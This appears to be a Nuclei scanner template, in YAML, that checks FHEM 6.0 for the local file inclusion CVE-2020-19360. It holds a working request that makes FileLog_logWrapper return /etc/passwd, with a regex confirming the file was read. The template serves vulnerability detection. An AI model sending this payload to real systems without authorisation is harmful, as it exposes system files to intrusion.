35 lines
986 B
YAML
35 lines
986 B
YAML
id: CVE-2020-19360
|
|
|
|
info:
|
|
name: FHEM 6.0 - Local File Inclusion
|
|
author: 0x_Akoko
|
|
severity: high
|
|
description: FHEM version 6.0 suffers from a local file inclusion vulnerability.
|
|
reference:
|
|
- https://github.com/EmreOvunc/FHEM-6.0-Local-File-Inclusion-LFI-Vulnerability/blob/master/README.md
|
|
- https://github.com/EmreOvunc/FHEM-6.0-Local-File-Inclusion-LFI-Vulnerability
|
|
- https://emreovunc.com/blog/en/FHEM-v6.0-LFI-Vulnerability-01.png
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-19360
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2020-19360
|
|
tags: fhem,lfi,cve,cve2020
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/05/04
|